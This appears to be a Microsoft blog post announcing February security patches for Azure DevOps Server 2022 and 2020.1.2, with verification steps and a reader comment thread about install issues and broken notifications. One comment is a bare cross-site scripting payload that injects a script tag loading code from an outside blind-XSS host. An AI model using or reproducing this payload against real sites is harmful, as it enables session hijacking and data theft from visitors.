Updated: February patches for Azure DevOps Server
Gloridel Morales
2/17 Update: After installing Azure DevOps Server 2020.1.2 Patch 5 notifications were not getting delivered. To address this issue, we are re-releasing the patch. If you installed Patch 5, you should download and re-install the patch from the link provided in the instructions below.
This month, we are releasing fixes that impact our self-hosted product, Azure DevOps Server.
The following will be fixed with this patch:
- CVE-2023-21564: Azure DevOps Server Cross-Site Scripting Vulnerability
- CVE-2023-21553: Azure DevOps Server Remote Code Execution Vulnerability
- Updated MSBuild and VSBuild tasks to support Visual Studio 2022.
- Update methodology of loading reauthentication to prevent XSS attack vector.
- Azure DevOps Server 2022 Proxy reports the following error: VS800069: This service is only available in on-premises Azure DevOps.
- Fixed shelvesets accessibility issue via web UI.
Azure DevOps Server 2022 Patch 2
If you have Azure DevOps Server 2022, you should install Azure DevOps Server 2022 Patch 2. Check out the release notes for more details.
Verifying Installation
- Run
devops2022patch2.exe CheckInstall,devops2022patch2.exeis the file that is downloaded from the link above. The output of the command will either say that the patch has been installed, or that it is not installed.
Azure DevOps Server 2020.1.2 Patch 5
If you have Azure DevOps Server 2020.1.1, you should first update to Azure DevOps Server 2020.1.2. Once on 2020.1.2, install Azure DevOps Server 2020.1.2 Patch 5. Check out the release notes for more details.
Verifying Installation
- Run
devops2020.1.2patch5.exe CheckInstall,devops2020.1.2patch5.exeis the file that is downloaded from the link above. The output of the command will either say that the patch has been installed, or that it is not installed.
Light
Dark
36 comments
the link for release notes point to an internal protected website: review.learn.microsoft.com
Hi Daniel, thank you for reporting this. It has been fixed.
'"><script src=//xss.report/s/herry1></script>
LGTM. I had installes the 2022.patch1 and 2022.patch2 on my lab server. After install both patch file, I reopened the azuredevops manager console, and the version number is still Server2022, not showinng the patch number. How can I make sure the patch was already installed completely?
Hi Quintos, did you try the verification steps listed in the blog post? You can also check the version of the following file:
Azure DevOps Server 2022 is installed to c:\Program Files\Azure DevOps Server 2022 by default. After installing Azure DevOps Server 2022 Patch 2, the version will be 19.205.33402.2.
Thanks. It works. And if I reinstall the patch2.exe, it will show current installed patch version .
@Gloridel
after running a fresh installation of Azure DevOps Server 2020.1 and upgrading it with the various patches til Azure DevOps Server 2022 Patch 2 the file Microsft.TeamFoundation.Framework.Server.dll is found in folder “Application Tier\Web Services\bin” and not in “Application Tier\bin” as you wrote.
In addition various files including “Application Tier\bin\Microsoft.TeamFoundation.Framework.Server.dll” from Azure DevOps Server 2020 installation are not uninstalled.
Link to the developer community report of the proxy issue:
https://developercommunity.visualstudio.com/t/Proxy-upgrade-to-2022-breaks-its-functio/10264792
Hi!
We’re missing Updates to Azure File Copy task and Repository as protected resource features in our installation of Azure DevOps Server 2022 v19.205.33122.1.
https://developercommunity.visualstudio.com/t/Azure-File-Copy-task-v5-missing-in-Azure/10275323?viewtype=all
https://developercommunity.visualstudio.com/t/Feature-Add-protection-to-repository-re/10275298
When will these be available?
After installing the patch (patching from plain 2020.1.2 to 2020.1.2 patch 5) on our instance it didnt send any mail notifications (pull requests, approval, comment mentions). Mail test from Console was successful but event log showed many errors (I removed some personal information)
Application Domain: TfsJobAgent.exe
Assembly: Microsoft.TeamFoundation.Framework.Server, Version=18.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a; v4.0.30319
Service Host: XXXXXXX (DefaultCollection)
Process Details:
Process Name: TfsJobAgent
Account name: XXXX
Detailed Message: TF400703: Unable to initialize the specified service Microsoft.TeamFoundation.Framework.Server.SmtpSettingsService.
Exception Message: TF400367: The request could not be performed due to a host type mismatch. Please check any connection information and verify the information is correct. The request was executed against a ProjectCollection. (type UnexpectedHostTypeException)
Exception Stack Trace: at Microsoft.TeamFoundation.Framework.Server.VssRequestContextExtensions.CheckDeploymentRequestContext(IVssRequestContext context)
at Microsoft.TeamFoundation.Framework.Server.SmtpSettingsService.Microsoft.TeamFoundation.Framework.Server.IVssFrameworkService.ServiceStart(IVssRequestContext systemRequestContext)
at Microsoft.TeamFoundation.Framework.Server.ServiceProvider.CreateService(IVssRequestContext requestContext, Type requestedType, Type managedType)
We restored our instance through restoring the modified files from C:\Program Files\Azure DevOps Server 2020\Backup
After restoring files and starting services again, all mails that should have been sent were delivered immediately.
We are in the progress of making an official call but please have a look at the code changes in SmtpSettingsService.ServiceStart.
I am interested in where this ends. We would not like to update if it results in no notification mails.
I also made a Developer Community report
Hi Michael, I forwarded your message to our team for investigation.
FWIW, I can confirm the exact same behavior identified by Michael Hauer after I applied Patch 5. Besides test emails generated from the console, no other alerts are working.
sdfd
Hello,
thanks for reporting this issue. We addressed it and will re-release the patch very soon.
Customers who already install Patch 5 for Azure DevOps Server 2020.1.2, will need to download updated patch and re-install it.
Sorry for the inconvinience it caused. We will reply to this thread once updated patch is available.
Regards,
–Vladimir
Thank you all for reporting this issue. We have re-released the patch and it is ready for you to install from the links provided in this blog.
this comment has been deleted.
this comment has been deleted.
So this did not impact 2022 Patch 2?
this comment has been deleted.
Correct, it didn’t impact Azure DevOps Server 2022 Patch 2.
Gloridel,
what is the difference of Azure DevOps Server 2022 Patch2 version 19.205.33402.2 released on Feb 15 compared to the download from Azure DevOps Server 2022 Patch2 version 18.181.32404.7 downloaded Feb 22 ?
the same 2022 Patch 2 with two different version numbers is confusing especially as the old list of Azure DevOps Server build numbers is no longer updated with official released Azure DevOps Server patches.
Daniel, they are both the same.
I can confirm that the re-released patch for 2020 fixes the reported issue.
After applying the patch on AzDO 2020.1.2, classic pipeline still shows only MSbuild 16.0/Visual Studio 2019
@Markus,
what are you expecting ? Visual Studio 2022 ?
support for VS 2022 is only added in AzureDevOps Server 2022 Patch 2 but not in 2020.1.2.
if you need VS 2022 support with AzDO 2020.1.2 than you can install Visual Studio 2022 support by Jesse from marketplace https://marketplace.visualstudio.com/items?itemName=jessehouwing.visualstudio and later switch back to standard task with VS2022 support after upgrading to AzDO 2022.
we’re currently using it and it works except that it is annoying to replace all the tasks which are using Visual Studio or VS Test.
Ok, then the description is misleading
BTW, the description also doesn’t mention that the build agent version will be updated (Which makes sense for supporting VS2022, which according to your statement is not the case 🤔)
I totally agree with Markus, so the blog reads like the changes are included in both patches, also Updated MSBuild and VSBuild tasks to support Visual Studio 2022. That could be improved.
the content of the blog is could be misleading.
You need to read the release notes for both patch and than you get that updated tasks for VS2022 are only included in Azure DevOps Server 2022 patch 2
Thank you, Markus, Daniel, and Alexander, for your feedback. It makes sense to specify in the blog post the changes that are applicable to each version of the product.
Just to be on the save side: I plan to do a fresh installation of Azure DevOps Server 2020.1.2 via ISO-Download. Is patch 5 cumulative or do I have to install all previous patches before patch 5?
Hi Raphael, patches are cumulative. You should install Azure DevOps Server 2020.1.2 Patch 5 after the fresh install of Azure DevOps Server 2020.1.2.
After installing the Patch 1.5 for AzureDevOps 2020 our server says that Version 18.181.33417.3 (Azure DevOps Server 2020 Update 1.2) is installed.
Could you please verify that this is the version expected after successful installation of patch 1.5.
Best Regards
Andreas
Hi Andreas, 18.181.33417.3 is the version after installing Azure DevOps Server 2020.1.2 Patch 5.
Thank you very much 🙂